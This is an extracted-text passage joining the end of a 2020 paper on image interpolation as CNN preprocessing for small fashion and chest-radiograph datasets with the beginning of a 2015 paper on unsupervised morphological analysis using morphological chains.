P, padding, S, stride; kernel size=5, stride=1, padding=0, dropout=0.5. Full-size DOI: 10.7717/peerjcs.312/fig-1 Nearest 28 × 28 Nearest 56 × 56 Bilinear Hamming Bicubic Lanczos Interpolation 0.54 0.56 0.58 0.60 0.62 0.64 0.66 0.68 A c c u ra c y A. Train size=100, Resolution=56 × 56 Nearest 28 × 28 Nearest 112 × 112 Bilinear Hamming Bicubic Lanczos Interpolation 0.525 0.550 0.575 0.600 0.625 0.650 0.675 0.700 0.725 A c c u ra c y B. Train size=100, Resolution=112 × 112 Figure 2 Accuracy obtained with 100 training data. (A) 56×56 pixels; (B) 112×112 pixels. Full-size DOI: 10.7717/peerjcs.312/fig-2 anatomically small tissues are made into an object, an image cut out from a diagnostic image may be used. In such cases, only low-resolution image are available. Thus, in this paper, we investigated the effectiveness of using low-resolution image data processed by a pixel interpolation method as training data. Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 3/13 https://peerj.com https://doi.org/10.7717/peerjcs.312/fig-1 https://doi.org/10.7717/peerjcs.312/fig-2 http://dx.doi.org/10.7717/peerj-cs.312 Nearest 28 × 28 Nearest 56 × 56 Bilinear Hamming Bicubic Lanczos Interpolation 0.70 0.72 0.74 0.76 0.78 A c c u ra c y A. Train size=500, Resolution=56 × 56 Nearest 28 × 28 Nearest 112 × 112 Bilinear Hamming Bicubic Lanczos Interpolation 0.70 0.72 0.74 0.76 0.78 0.80 A c c u ra c y B. Train size=500, Resolution=112 × 112 Figure 3 Accuracy obtained with 500 training data. (A) 56×56 pixels; (B) 112×112 pixels. Full-size DOI: 10.7717/peerjcs.312/fig-3 CNN is a convolution process extracting features that fit the convolution kernel. Convolution kernel sizes of 3×3 and 5×5 are commonly used. If the image data input to the CNN is small, the necessary features may not be extracted. Therefore, we increased the input image data size using the interpolation method. In this paper, we reveal the impact of different pixel interpolation methods on model training, such as training models on low-resolution image data or training models on medical images that are cropped for the necessary part of the image. MATERIALS & METHODS In this study, the Fashion-MNIST dataset (Xiao, Rasul & Vollgraf, 2017) was used to verify improvements in average classification accuracy. The Fashion-MNIST dataset contains 10 fashion images and is unbiased because all classes are equal. Note that monochrome images are often used in image diagnosis, and this dataset has similar features. In addition, the image size in the dataset is 28×28 pixels. After examining the Fashion-MNIST dataset, we used the Gender01 data set, which predicts gender from chest radiographs published in the miniJSRT_database, as a medical Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 4/13 https://peerj.com https://doi.org/10.7717/peerjcs.312/fig-3 http://dx.doi.org/10.7717/peerj-cs.312 Nearest 28 × 28 Nearest 56 × 56 Bilinear Hamming Bicubic Lanczos Interpolation 0.75 0.76 0.77 0.78 0.79 0.80 0.81 A c c u ra c y A. Train size=1000, Resolution=56 × 56 Nearest 28 × 28 Nearest 112 × 112 Bilinear Hamming Bicubic Lanczos Interpolation 0.75 0.76 0.77 0.78 0.79 0.80 0.81 0.82 0.83 A c c u ra c y B. Train size=1000, Resolution=112 × 112 Figure 4 Accuracy obtained with 500 training data. (A) 56×56 pixels; (B) 112×112 pixels. Full-size DOI: 10.7717/peerjcs.312/fig-4 image dataset (Shiraishi et al., 2000). The image size in this dataset is 256×256 pixels, and there are 119 and 128 images of men and women, respectively. Moreover, Python 3.6 was used as the programming language, PyTorch (version 1.1.0) was used as the deep learning framework, and Google Colaboratory was utilized for the environment. As a deep learning model, we created and trained the CNN model. The structure of the created CNN model is shown in Fig. 1. Herein, the mini-batch method was used to train the CNN model. The training parameters included the following: the batch_size was 100, epochs were 200, Adam’s method was used for optimization, and mean square error was used for loss function. We used the rectified linear unit as the activation function. The number of channels must be determined arbitrarily, and the kernel size, stride, and padding were common to all convolutional layers. Dropout was applicable to dense1 and dense2. The image data interpolation method used as input to CNN was the image processing library for Python Pillow’s five pixel interpolation methods (Nearest (Lehmann, Gonner & Spitzer, 1999), Bilinear (Lehmann, Gonner & Spitzer, 1999), Hamming (Harris, 1978), Bicubic (Keys, 1981), and Lanczos (Duchon, 1979)). The nearest neighbor refers to and interpolates the brightness value of the pixel nearest to the reference position. In Bilinear, luminance values are linearly interpolated using 2×2 pixels (4 pixels) Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 5/13 https://peerj.com https://doi.org/10.7717/peerjcs.312/fig-4 http://dx.doi.org/10.7717/peerj-cs.312 Nearest 28 × 28 Nearest 56 × 56 Bilinear Hamming Bicubic Lanczos Interpolation 0.845 0.850 0.855 0.860 0.865 0.870 0.875 A c c u ra c y A. Train size=5000, Resolution=56 × 56 Nearest 28 × 28 Nearest 112 × 112 Bilinear Hamming Bicubic Lanczos Interpolation 0.845 0.850 0.855 0.860 0.865 0.870 A c c u ra c y B. Train size=5000, Resolution=112 × 112 Figure 5 Accuracy obtained with 5,000 training data. (A) 56×56 pixels; (B) 112×112 pixels. Full-size DOI: 10.7717/peerjcs.312/fig-5 in the vicinity of the position (x,y) to obtain luminance values and interpolate them. In Bicubic, luminance values are obtained and interpolated by interpolating luminance values with a cubic formula using 4×4 pixels (16 pixels) around the calculated position (x,y). Hamming and Lanczos are window functions, which, along with the Han window, are among the most commonly used window functions. It has a better frequency resolution and a narrower dynamic range than the Han window. Characterized by discontinuities at both ends of the interval, the Lanczos window is one of the many finite support approximations of the sinc filter. Each interpolation value is a weighted sum of two consecutive input samples. For additional details about each method, refer to Pillow’s documentation and original papers (Lehmann, Gonner & Spitzer, 1999; Harris, 1978; Keys, 1981; Duchon, 1979). In the Fashion-MNIST dataset investigation, the total number of coupling layers in the CNN was changed from 256 to 5,184 when image interpolation was doubled and 33,856 when it was quadrupled. Here, a small subset of images (100, 500, 1,000, 5,000, 10,000, and 50,000) was constructed from 60,000 images such that the number of images per class was uniform. Then, classification accuracy was obtained by identifying 10,000 images used as test data. The training and evaluation processed were each performed 10 times. Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 6/13 https://peerj.com https://doi.org/10.7717/peerjcs.312/fig-5 http://dx.doi.org/10.7717/peerj-cs.312 Nearest 28 × 28 Nearest 56 × 56 Bilinear Hamming Bicubic Lanczos Interpolation 0.8725 0.8750 0.8775 0.8800 0.8825 0.8850 0.8875 0.8900 0.8925 A c c u ra c y A. Train size=10000, Resolution=56 × 56 Nearest 28 × 28 Nearest 112 × 112 Bilinear Hamming Bicubic Lanczos Interpolation 0.8725 0.8750 0.8775 0.8800 0.8825 0.8850 0.8875 0.8900 A c c u ra c y B. Train size=10000, Resolution=112 × 112 Figure 6 Accuracy obtained with 10,000 training data. (A) 56×56 pixels; (B) 112×112 pixels. Full-size DOI: 10.7717/peerjcs.312/fig-6 In addition, it was compared with a conventional image data augmentation method, i.e., rotation and inversion. Here, horizontal inversion and rotation of ±20◦ were applied randomly to a group of training images, and the training and evaluation processes were each performed 10 times. For the Gender01 dataset, the image size was reduced to 28×28 pixels by resizing. Here, considering an image as an input to the training model, the number of fully-connected layers was changed from 256 to 5,184 on doubling the resolution using five different Pillow’s pixel interpolation methods and from 256 to 33,856 on quadrupling the resolution. The Gender01 dataset was examined with ten-fold cross-validation because the total number of datasets was only 247. RESULTS Figure 2 shows the results of training using 100 pieces of data processed using the five image interpolation methods. With a mean classification accuracy of 0.563 for the training model in the source image, in which the image size was not expanded by the interpolation method, the average classification accuracy was improved for all models trained with image enlargement data using the pixel interpolation method. The method that most improved the Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 7/13 https://peerj.com https://doi.org/10.7717/peerjcs.312/fig-6 http://dx.doi.org/10.7717/peerj-cs.312 Nearest 28 × 28 Nearest 56 × 56 Bilinear Hamming Bicubic Lanczos Interpolation 0.910 0.915 0.920 0.925 0.930 A c c u ra c y A. Train size=50000, Resolution=56 × 56 Nearest 28 × 28 Nearest 112 × 112 Bilinear Hamming Bicubic Lanczos Interpolation 0.910 0.912 0.914 0.916 0.918 0.920 0.922 0.924 A c c u ra c y B. Train size=50000, Resolution=112 × 112 Figure 7 Accuracy obtained with 50,000 training data. (A) 56×56 pixels; (B) 112×112 pixels. Full-size DOI: 10.7717/peerjcs.312/fig-7 classification accuracy was the two-fold magnification method with an average classification accuracy of 0.698 for the Box and the four-fold magnification method with an average classification accuracy of 0.715 for the Bilinear. The mean classification accuracy was improved by up to 0.152 over the training model for the source image. The results obtained with data counts of 500, 1,000, 5,000, 10,000, and 50,000 are shown in Figs. 3, 4, 5, 6, and 7, respectively. In all cases, the data obtained when the image was enlarged and trained were more accurate than the original data. Figure 8 shows the results of training by increasing the number of data by rotating and inverting the image. Here, for comparison, the results of training using the data obtained by the Bilinear image interpolation method are also shown in Fig. 8. The minimum average classification accuracy when rotating and inverting the data augmentation was 0.580 when the number of training data was 100. The maximum average classification accuracy was 0.912 when the number of training data was 50,000. The minimum mean classification accuracy on performing data augmentation using the Bilinear image interpolation method was 0.675 for 100 training data and an image size of 56×56. The maximum average classification accuracy was 0.927 for 50,000 training data and an image size of 56×56. Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 8/13 https://peerj.com https://doi.org/10.7717/peerjcs.312/fig-7 http://dx.doi.org/10.7717/peerj-cs.312 100 500 1000 5000 1000050000 Train size 0.55 0.60 0.65 0.70 0.75 0.80 0.85 0.90 A c c u ra c y A. Flip and rotate 100 500 1000 5000 1000050000 Train size 0.65 0.70 0.75 0.80 0.85 0.90 A c c u ra c y B. Bilinear 56 × 56 100 500 1000 5000 1000050000 Train size 0.70 0.75 0.80 0.85 0.90 A c c u ra c y C. Bilinear 112 × 112 Figure 8 Comparison of the classification accuracy between training models of data augmentation us- ing rotation and inversion and image augmentation using Bilinear. (A) Data augmentation by rotation and inversion, (B) Bilinear 56×56, (C) Bilinear 112×112. Full-size DOI: 10.7717/peerjcs.312/fig-8 Finally, the medical image results are shown in Fig. 9. Here, the average accuracy of 28×28 pixels was 0.85, and the average accuracy of 56×56 pixels 0.863 to 0.880. By doubling interpolation, the average accuracy improved by 0.0163 to 0.023. At 112×112 pixels, the average accuracy was 0.875 to 0.892, which is an improvement of 0.025 to 0.042 with four-fold interpolation. At 28×28 pixels, the minimum accuracy was 0.625, which was 0.2 less than the average. Here, the minimum accuracy was 0.75 when the image was enlarged, which resulted in stability. DISCUSSION The obtained results demonstrate that as the number of image data used for training increases, the features of images that can be extracted by CNN also increases and the effect of increasing the features obtained by image interpolation decreases. From these results, it is considered that the effect of image interpolation is high even if the number of data used for training is small. Although the Wu et al. study is also due to color images, the true class is out of the top five predictions when models trained on 256×256 low-resolution images are used. Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 9/13 https://peerj.com https://doi.org/10.7717/peerjcs.312/fig-8 http://dx.doi.org/10.7717/peerj-cs.312 Nearest 28 × 28 Nearest 56 × 56 Box Bilinear Hamming Bicubic Lanczos Interpolation 0.65 0.70 0.75 0.80 0.85 0.90 0.95 1.00 A c c u ra c y A. Resolution=56 × 56 Nearest 28 × 28 Nearest 112 × 112 Box Bilinear Hamming Bicubic Lanczos Interpolation 0.65 0.70 0.75 0.80 0.85 0.90 0.95 1.00 A c c u ra c y B. Resolution=112 × 112 Figure 9 Accuracy of chest radiograph gender classification dataset. (A) 56×56 pixels; (B) 112×112 pixels. Full-size DOI: 10.7717/peerjcs.312/fig-9 High-resolution training at 512×512 captured more features of the predicted target and showed that it recognized images in second place (Wu et al., 2015). Moreover, by comparing two- and four-fold interpolations, we found that high accuracy was obtained with four-fold interpolation even if the number of data is less than 1,000. However, if the number of data exceeded 5,000, two-fold interpolation provided higher accuracy than the four-fold interpolation. Although image data interpolation increased the feature value, effective information was not always generated by the interpolation process. Thus, to improve the accuracy further, we consider that it is insufficient to only increase the feature value. In other words, the quality of the data must also be improved. This result demonstrates that when the number of data is large, unimportant information is included, which results in an inverse effect because many feature values are increased by the algorithm in the four-fold interpolation. From the results obtained using data augmentation by image inversion, image rotation, and image interpolation, we found that when there are many normal images in the original image data, the information created by these procedures does not function as valid data. Thus, even though the number of data increases, the increased amount of data does not Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 10/13 https://peerj.com https://doi.org/10.7717/peerjcs.312/fig-9 http://dx.doi.org/10.7717/peerj-cs.312 result in improved accuracy. In addition, the accuracy improvement obtained using image interpolation was remarkable when the number of data was small; thus, we consider that image interpolation is an effective method to improve accuracy compared with the conventional method, i.e., rotation and inversion. CONCLUSIONS In this paper, we investigated the effect of using interpolated image sizes for training data on the classification accuracy using five image interpolation methods on monochrome and low-quality fashion image data. For all methods, we confirmed that image interpolation combined with interpolation improved the accuracy and demonstrated that this approach was particularly effective with small amounts of data. For example, when the number of data was small, four-fold interpolation was effective, however, as the number data increased, two-fold interpolation demonstrated higher accuracy. Furthermore, image interpolation was more accurate than data augmentation by rotation and inversion operations of the conventional method. Thus, even though there is an optimal value for the increased image size, it can be considered that image interpolation is a more useful preprocessing technology than rotation and inversion operations. We expect that these results will have practical implications in image preprocessing technology in the medical field, where only a small amount of low-resolution data can be obtained. The proposed method is a preprocessing method that can be used by medical specialists without requiring machine learning technology. In addition, image classification can be further improved by utilizing the expertise on images. Finally, we expect that the proposed method will contribute to the development of medical image classification technology by fusing medical specialist expertise and easy-to-use image interpolation preprocessing technology. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Daisuke Hirahara conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Eichi Takaya conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • Taro Takahara and Takuya Ueda analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 11/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.312 Data Availability The following information was supplied regarding data availability: The code used for the study is available as a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.312#supplemental-information. REFERENCES Bakkouri I, Afdel K. 2019. Multi-scale CNN based on region proposals for efficient breast abnormality recognition. Multimedia Tools and Applications 78:12939–12960 DOI 10.1007/s11042-018-6267-z. Duchon CE. 1979. Lanczos filtering in one and two dimensions. Journal of Applied Meteorology 18(8):1016–1022 DOI 10.1175/1520-0450(1979)018<1016:LFIOAT>2.0.CO;2. Harris FJ. 1978. On the use of windows for harmonic analysis with the discrete Fourier transform. Proceedings of the IEEE 66(1):51–83 DOI 10.1109/PROC.1978.10837. Hendrycks D, Mu N, Cubuk ED, Zoph B, Glimer J, Lakshminarayanan B. 2020. AugMix: a simple data processing method to improve robustness and uncertainty. In: Proceedings of the international conference on learning representations. Hijazi S, Kumar R, Rowen C. 2015. Using convolutional neural networks for image recognition. San Jose: Cadence Design Systems Inc., 1–12. Keys R. 1981. Cubic convolution interpolation for digital image processing. IEEE Transactions on Acoustics, Speech, and Signal Processing 29(6):1153–1160 DOI 10.1109/TASSP.1981.1163711. Kyono T, Gilbert FJ, Van der Schaar M. 2020. Improving workflow efficiency for mammography using machine learning. Journal of the American College of Radiology 17(1):56–63 DOI 10.1016/j.jacr.2019.05.012. Lehmann TM, Gonner C, Spitzer K. 1999. Survey: interpolation methods in medical image processing. IEEE Transactions on Medical Imaging 18(11):1049–1075 DOI 10.1109/42.816070. Poplin R, Varadarajan AV, Blumer K, Liu Y, McConnell MV, Corrado GS, Peng L, Webster DR. 2018. Prediction of cardiovascular risk factors from retinal fundus photographs via deep learning. Nature Biomedical Engineering 2(3):158–164 DOI 10.1038/s41551-018-0195-0. Samanta A, Saha A, Satapathy SC, Fernandes SL, Zhang Y-D. 2020. Automated detection of diabetic retinopathy using convolutional neural networks on a small dataset. Pattern Recognition Letters 135:293–298 DOI 10.1016/j.patrec.2020.04.026. Shiraishi J, Katsuragawa S, Ikezoe J, Matsumoto T, Kobayashi T, Komatsu K, Matsui M, Fujita H, Kodera Y, Doi K. 2000. Development of a digital image database for chest radiographs with and without a lung nodule: receiver operating characteristic analysis of radiologists’ detection of pulmonary nodules. American Journal of Roentgenology 174:71–74 DOI 10.2214/ajr.174.1.1740071. Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 12/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.312#supplemental-information http://dx.doi.org/10.7717/peerj-cs.312#supplemental-information http://dx.doi.org/10.7717/peerj-cs.312#supplemental-information http://dx.doi.org/10.1007/s11042-018-6267-z http://dx.doi.org/10.1175/1520-0450(1979)018<1016:LFIOAT>2.0.CO;2 http://dx.doi.org/10.1109/PROC.1978.10837 http://dx.doi.org/10.1109/TASSP.1981.1163711 http://dx.doi.org/10.1016/j.jacr.2019.05.012 http://dx.doi.org/10.1109/42.816070 http://dx.doi.org/10.1038/s41551-018-0195-0 http://dx.doi.org/10.1016/j.patrec.2020.04.026 http://dx.doi.org/10.2214/ajr.174.1.1740071 http://dx.doi.org/10.7717/peerj-cs.312 Wu R, Yan Shengen, Shan Y, Dang Q, Sun G. 2015. Deep image: scaling up image recognition. ArXiv preprint. arXiv:1501.02876. Xiao H, Rasul K, Vollgraf R. 2017. Fashion-MNIST: a novel image dataset for bench- marking machine learning algorithms. ArXiv preprint. arXiv:1708.07747. Zhang H, Cisse M, Dauphin YN, Lopez-Paz D. 2018. Mixup: beyond empirical risk min- imization. In: Proceedings of the international conference on learning representations. Zhong Z, Zheng L, Kang G, Li S, Yang Y. 2020. Random erasing data augmentation. Proceedings of the AAAI Conference on Artificial Intelligence: Proceedings of the Thirtieth AAAI Conference on Artificial Intelligence 34(7):13001–13008 DOI 10.1609/aaai.v34i07.7000. Zhou X, Takayama R, Wang S, Hara T, Fujita H. 2017. Deep learning of the sectional appearances of 3D CT images for anatomical structure segmentation based on an FCN voting method. Medical Physics 44(10):5221–5233 DOI 10.1002/mp.12480. Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 13/13 https://peerj.com http://arXiv.org/abs/1501.02876 http://arXiv.org/abs/1708.07747 http://dx.doi.org/10.1609/aaai.v34i07.7000 http://dx.doi.org/10.1002/mp.12480 http://dx.doi.org/10.7717/peerj-cs.312 work_ylcltxmpvvdbdmljbf3fmued3q ---- An Unsupervised Method for Uncovering Morphological Chains Karthik Narasimhan, Regina Barzilay and Tommi Jaakkola CSAIL, Massachusetts Institute of Technology {karthikn, regina, tommi}@csail.mit.edu Abstract Most state-of-the-art systems today produce morphological analysis based only on ortho- graphic patterns. In contrast, we propose a model for unsupervised morphological anal- ysis that integrates orthographic and seman- tic views of words. We model word forma- tion in terms of morphological chains, from base words to the observed words, breaking the chains into parent-child relations. We use log-linear models with morpheme and word- level features to predict possible parents, in- cluding their modifications, for each word. The limited set of candidate parents for each word render contrastive estimation feasible. Our model consistently matches or outper- forms five state-of-the-art systems on Arabic, English and Turkish.1 1 Introduction Morphologically related words exhibit connections at multiple levels, ranging from orthographical pat- terns to semantic proximity. For instance, the words playing and played share the same stem, but also carry similar meaning. Ideally, all these comple- mentary sources of information would be taken into account when learning morphological structures. Most state-of-the-art unsupervised approaches to morphological analysis are built primarily around orthographic patterns in morphologically-related words (Goldwater and Johnson, 2004; Creutz and Lagus, 2007; Snyder and Barzilay, 2008; Poon et al., 2009). In these approaches, words are com- monly modeled as concatenations of morphemes. 1Code is available at https://github.com/ karthikncode/MorphoChain. This morpheme-centric view is well-suited for un- covering distributional properties of stems and af- fixes. But it is not well-equipped to capture semantic relatedness at the word level. In contrast, earlier approaches that capture se- mantic similarity in morphological variants oper- ate solely at the word level (Schone and Juraf- sky, 2000; Baroni et al., 2002). Given two candi- date words, the proximity is assessed using standard word-distributional measures such as mutual infor- mation. However, the fact that these models do not model morphemes directly greatly limits their per- formance. In this paper, we propose a model to integrate or- thographic and semantic views. Our goal is to build a chain of derivations for a current word from its base form. For instance, given a word playfully, the corresponding chain is play → playful → playfully. The word play is a base form of this derivation as it cannot be reduced any further. Individual deriva- tions are obtained by adding a morpheme (ex. -ful ) to a parent word (ex. play). This addition may be implemented via a simple concatenation, or it may involve transformations. At every step of the chain, the model aims to find a parent-child pair (ex. play- playful ) such that the parent also constitutes a valid entry in the lexicon. This allows the model to di- rectly compare the semantic similarity of the parent- child pair, while also considering the orthographic properties of the morphemic combination. We model each step of a morphological chain by means of a log-linear model that enables us to in- corporate a wide range of features. At the seman- tic level, we consider the relatedness between two words using the corresponding vector embeddings. At the orthographic level, features capture whether 157 Transactions of the Association for Computational Linguistics, vol. 3, pp. 157–167, 2015. Action Editor: Yuji Matsumoto. Submission batch: 9/2014; Revision batch: 12/2014; Revision batch 2/2015; Published 3/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. https://github.com/karthikncode/MorphoChain https://github.com/karthikncode/MorphoChain the words in the chain actually occur in the corpus, how affixes are reused, as well as how the words are altered during the addition of morphemes. We use Contrastive Estimation (Smith and Eisner, 2005) to efficiently learn this model in an unsupervised manner. Specifically, we require that each word has greater support among its bounded set of candidate parents than an artificially constructed neighboring word would. We evaluate our model on datasets in three lan- guages: Arabic, English and Turkish. We compare our performance against five state-of-the-art unsu- pervised systems: Morfessor Baseline (Virpioja et al., 2013), Morfessor CatMAP (Creutz and Lagus, 2005), AGMorph (Sirts and Goldwater, 2013), the Lee Segmenter (Lee et al., 2011; Stallard et al., 2012) and the system of Poon et al. (2009). Our model consistently equals or outperforms these sys- tems across the three languages. For instance, on English, we obtain an 8.5% gain in F-measure over Morfessor. Our experiments also demonstrate the value of semantic information. While the contribu- tion varies from 3% on Turkish to 11% on the En- glish dataset, it nevertheless improves performance across all the languages. 2 Related Work Currently, top performing unsupervised morpholog- ical analyzers are based on the orthographic prop- erties of sub-word units (Creutz and Lagus, 2005; Creutz and Lagus, 2007; Poon et al., 2009; Sirts and Goldwater, 2013). Adding semantic information to these systems is not an easy task, as they operate at the level of individual morphemes, rather than mor- phologically related words. The value of semantic information has been demonstrated in earlier work on morphological anal- ysis. Schone and Jurafsky (2000) employ an LSA- based similarity measure to identify morphological variants from a list of orthographically close word pairs. The filtered pairs are then used to identify stems and affixes. Based on similar intuition, Baroni et al. (2002) design a method that integrates these sources of information, captured as two word pair lists, ranked based on edit distance and mutual in- formation. These lists are subsequently combined using a deterministic weighting function. In both of these algorithms, orthographic related- ness is based on simple deterministic rules. There- fore, semantic relatedness plays an essential role in the success of these methods. However, these al- gorithms do not capture distributional properties of morphemes that are critical to the success of current state-of-the-art algorithms. In contrast, we utilize a single statistical framework that seamlessly com- bines both sources of information. Moreover, it al- lows us to incorporate a wide range of additional features. Our work also relates to the log-linear model for morphological segmentation developed by Poon et al. (2009). They propose a joint model over all words (observations) and their segmentations (hid- den), using morphemes and their contexts (charac- ter n-grams) for the features. Since the space of all possible segmentation sets is huge, learning and in- ference are quite involved. They use techniques like Contrastive Estimation, sampling and simulated an- nealing. In contrast, our formulation does not re- sult in such a large search space. For each word, the number of parent candidates is bounded by its length multiplied by the number of possible trans- formations. Therefore, Contrastive Estimation can be implemented via enumeration, and does not re- quire sampling. Moreover, operating at the level of words (rather than morphemes) enables us to incor- porate semantic and word-level features. Most recently, work by Sirts and Goldwater (2013) uses Adaptor Grammars for minimally su- pervised segmentation. By defining a morphological grammar consisting of zero or more prefixes, stems and suffixes, they induce segmentations over words in both unsupervised and semi-supervised settings. While their model (AGMorph) builds up a word by combining morphemes in the form of a parse tree, we operate at the word level and build up the final word via intermediate words in the chain. In other related work, Dreyer and Eisner (2011) tackle the problem of recovering morphological paradigms and inflectional principles. They use a Bayesian generative model with a log-linear framework, using expressive features, over pairs of strings. Their work, however, handles a different task from ours and requires a small amount of an- notated data to seed the model. In this work, we make use of semantic infor- 158 mation to help morphological analysis. Lee et al. (2011) present a model that takes advantage of syn- tactic context to perform better morphological seg- mentation. Stallard et al. (2012) improve on this ap- proach using the technique of Maximum Marginal decoding to reduce noise. Their best system con- siders entire sentences, while our approach (and the morphological analyzers described above) operates at the vocabulary level without regarding sentence context. Hence, though their work is not directly comparable to ours, it presents an interesting orthog- onal view to the problem. 3 Model 3.1 Definitions and Framework We use morphological chains to model words in the language. A morphological chain is a short sequence of words that starts from the base word and ends up in a morphological variant. Each node in the chain is, by assumption, a valid word. We refer to the word that is morphologically changed as the parent word and its morphological variant as the child word. A word that does not have any morphological parent is a base word (e.g., words like play, chat, run ).2 Words in a chain (other than the base word) are created from their parents by adding morphemes (prefixes, suffixes, or other words). For example, a morphological chain that ends up in the word in- ternationally could be nation → national → inter- national → internationally. The base word for this chain is nation. Note that the same word can belong to multiple morphological chains. For example, the word national appears also as part of another chain that ends up in nationalize. These chains are treated separately but with shared statistical support for the common parts. For this reason, our model breaks morphological chains into possible parent-child re- lations such as (nation, national ). We use a log-linear model for predicting parent- child pairs. A log-linear model allows an easy, effi- cient way of incorporating several different features pertaining to parent-child relations. In our case, we leverage both orthographic and semantic patterns to encode representative features. 2We distinguish base words from morphological roots which do not strictly speaking have to be valid words in the language. Segment Cosine Similarity p 0.095 pl -0.037 pla -0.041 play 0.580 playe 0.000 player 1.000 Table 1: Cosine similarities between word vectors of various segments of the word player and the vector of player. A log-linear model consists of a set of features represented by a feature vector φ : W ×Z → Rd and a corresponding weight vector θ ∈ Rd. Here, W is a set of words and Z is the set of candidates for words in W, that includes the parents as well as their types. Specifically, a candidate is a (parent, type) pair, where the type variable keeps track of the type of morphological change (or the lack thereof if there is no parent) as we go from the parent to the child. In our experiments, Z is obtained by collecting to- gether all sub-words created by splitting observed words in W at all different points. For instance, if we take the word cars, the candidates obtained by splitting would include (car, Suffix), (ca, Suffix), (c, Suffix), (ars, Prefix), (rs, Prefix) and (s, Prefix). Note that the parent may undergo changes as it is joined with the affix and thus, there are more choices for the parent than just the ones obtained by splitting. Hence, to the set of candidates, we also add modified sub-words where transformations in- clude character repetition (plan → planning ), dele- tion (decide → deciding ) or replacement (carry → carried ).3 Following the above example for the word cars, we get candidates like (cat, Modify) and (cart, Delete). Each word also has a stop candidate (-, Stop), which is equivalent to considering it as a base word with no parent. Let us define the probability of a particular word- candidate pair (w ∈ W,z ∈ Z) as P(w,z) ∝ eθ·φ(w,z). The conditional probability of a candidate 3We found that restricting the set of parents to sub-words that are at least half the length of the original word helped im- prove the performance of the system. 159 z given a word w is then P(z|w) = e θ·φ(w,z) ∑ z′∈C(w) e θ·φ(w,z′) , z ∈ C(w) where C(w) ⊂Z refers to the set of possible candi- dates (parents and their types) for the word w ∈W. In order to generate a possible ancestral chain for a word, we recursively predict parents until the word is predicted to be a base word. In our model, these choices are included in the set of candidates for the specific word, and their likelihood is controlled by the type related features. Details of these and other features are given in section 3.2. 3.2 Features This section provides an overview of the features used in our model. The features are defined for a given word w, parent p and type t (recall that a can- didate z ∈ Z is the pair (p,t)). For computing some of these features, we use an unannotated list of words with frequencies (details in section 4). Ta- ble 2 provides a summary of the features. Semantic Similarity We hypothesize that mor- phologically related words exhibit semantic similar- ity. To this end, we introduce a feature that mea- sures cosine similarity between the word vectors of the word (~w) and the parent (~p). These word vectors are learned from co-occurrence patterns from a large corpus4 (see section 4 for details). To validate this measure, we computed the cosine similarity between words and their morphological parents from the CELEX2 database (Baayen et al., 1995). On average, the resulting word-parent sim- ilarity score is 0.351, compared to 0.116 for ran- domly chosen word-parent combinations.5 Affixes A distinctive feature of affixes is their fre- quent occurrence in multiple words. To capture this pattern, we automatically generate a list of fre- quently occurring candidate affixes. These candi- dates are collected by considering the string differ- ence between a word and its parent candidates which appear in the word list. For example, for the word paints, possible suffixes include -s derived from the 4For strings which do not have a vector learnt from the cor- pus, we set the cosine value to be -0.5. 5The cosine values range from around -0.1 to 0.7 usually. Language Top suffixes English -s, -’s, -d, -ed, -ing, -’, -s’, -ly, -er, -e Turkish -n, -i, -lar, -dir, -a, -den, -de, -in, -leri, -ler Arabic -p, -A, -F, -y, -t, -AF, -h, -hA, -yp, -At Table 3: Top ten suffixes in automatically produced suffix lists. parent paint, -ts from the parent pain and -ints from the word pa. Similarly, we compile a list of poten- tial prefixes. These two lists are sorted by their fre- quency and thresholded. For each affix in the lists, we have a corresponding indicator variable. For un- seen affixes, we use an UNK (unknown) indicator. These automatically constructed lists act as a proxy for the gold affixes. In English, choosing the top 100 suffixes in this manner gives us 43 correct suffixes (compared against gold suffixes). Table 3 gives some examples of suffixes generated this way. Affix Correlation While the previous feature con- siders one affix assignment at a time, there is a known correlation between affixes attached to the same stem. For instance, in English, verbs that can be modified by the suffix -ing, can also take the related suffix -ed. Therefore, we introduce a fea- ture that measures, whether for a given affix and parent, we also observe in the wordlist the same parent modified by its related affix. For exam- ple, for the pair (walking, walk), the feature in- stance AffixCorr(ing, ed) is set to 1, because the word walked is in the WordList. To construct pairs of related affixes, we compute the correlation between pairs in auto-generated affix list described previously. This correlation is propor- tional to the number of stems the two affixes share. For English, examples of such pairs include (inter-, re-), (under-, over-), (-ly, -s), and (-er, -ing). Presence in Wordlist We want to bias the model to select parents that constitute valid words.6 More- over, we would like to take into account the fre- quency of the parent words. We encode this infor- mation as the logarithm of their word counts in the wordlist (WordFreq). For parents not in the wordlist, we set a binary OutOfVocab feature to 1. 6This is not an absolute requirement in the model. 160 Feature type Word (w) Candidate (p,t) Feature Value Cosine painter (paint, Suffix) ~w ·~p 0.58 Affix painter (paint, Suffix) suffix=er 1 Affix Correlation walking (walk, Suffix) AffixCorr(ing, ed) 1 Wordlist painter (paint, Suffix) WordFreq 8.73 OutOfVocab 0 Transformations planning (plan, Repeat) type=Repeat × chars=(n,-) 1 deciding (decide, Delete) type=Delete × chars=(e,-) 1 carried (carry, Modify) type=Modify × chars=(y,i) 1 Stop painter 